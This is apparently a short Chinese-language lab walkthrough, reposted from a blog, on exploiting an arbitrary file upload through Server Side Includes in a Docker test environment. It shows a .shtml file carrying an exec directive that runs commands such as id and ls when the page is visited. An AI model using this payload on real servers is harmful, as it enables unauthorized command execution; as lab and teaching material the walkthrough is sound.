service docker start
docker-compose up -d

查看监听端口
docker-compose ps

访问http://target_ip:8080/upload.php

在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用<!--#exec cmd="id" -->语法执行任意命令。
随意上传一个文件,将文件名后缀改为.shtml,内容为<!--#exec cmd="执行的命令" -->
先用ls尝试一下上传

访问http://target_ip:8080/shell.shtml成功执行了命令

再试试id,上传为shel.shtml

访问http://target_ip:8080/shel.shtml,同样成功执行命令

原文:https://www.cnblogs.com/-Anguvia-/p/14611789.html